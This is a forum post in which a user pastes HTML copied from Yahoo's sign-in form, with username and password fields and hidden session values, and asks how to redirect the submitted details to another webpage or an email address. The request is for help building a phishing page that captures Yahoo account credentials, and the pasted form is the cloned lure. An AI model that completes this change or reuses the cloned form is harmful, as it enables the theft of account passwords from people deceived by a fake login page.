Hello, I'm new here. I have code here for a log-on, but I want to change it so it will either send the information to an existing webpage, or in the form of email. Does somebody know how I can alter the following code to do so.
Code:
<FIELDSET><LEGEND>Login Form</LEGEND>
<FORM name=login_form action=https://login.yahoo.com/config/login? method=post
autocomplete="off"><INPUT type=hidden value=1 name=.tries> <INPUT type=hidden
value=fpctx name=.src> <INPUT type=hidden name=.md5> <INPUT type=hidden
name=.hash> <INPUT type=hidden name=.js> <INPUT type=hidden name=.last> <INPUT
type=hidden name=promo> <INPUT type=hidden value=us name=.intl> <INPUT
type=hidden name=.bypass> <INPUT type=hidden name=.partner> <INPUT type=hidden
value=bc97sqp2pgt6a name=.u> <INPUT type=hidden value=0 name=.v> <INPUT
type=hidden value=7rVmdWdv6BvUfBUWnzBL2jffYGFi name=.challenge> <INPUT
type=hidden name=.yplus> <INPUT type=hidden name=.emailCode> <INPUT type=hidden
name=pkg> <INPUT type=hidden name=stepid> <INPUT type=hidden name=.ev> <INPUT
type=hidden value=0 name=hasMsgr> <INPUT type=hidden value=Y name=.chkP> <INPUT
type=hidden value=http://www.yahoo.com name=.done> <INPUT type=hidden
value=fpctx_ver%3d0 name=.pd>
<TABLE id=yreglgtb summary="form: login information">
<TBODY>
<TR>
<TH><LABEL for=username>Yahoo! ID:</LABEL></TH>
<TD><INPUT class=yreg_ipt id=username size=17 name=login></TD>
<SCRIPT language=JavaScript type=text/javascript>if(document.getElementById) document.getElementById('username').focus();</SCRIPT>
</TR>
<TR>
<TH><LABEL for=passwd>Password:</LABEL></TH>
<TD><INPUT class=yreg_ipt id=passwd type=password size=17
name=passwd></TD></TR></TBODY></TABLE>
<P><INPUT id=persistent type=checkbox value=y name=.persistent> <LABEL
for=persistent>Remember my ID on this computer</LABEL></P>
<P
class=yreglgsb><INPUT type=submit value="Sign In" name=.save></P></FORM></FIELDSET>
Perhaps this is the wrong Forum for this thread? Please forgive me if so. I believe it is HTML since the page I got it from was in the htm format.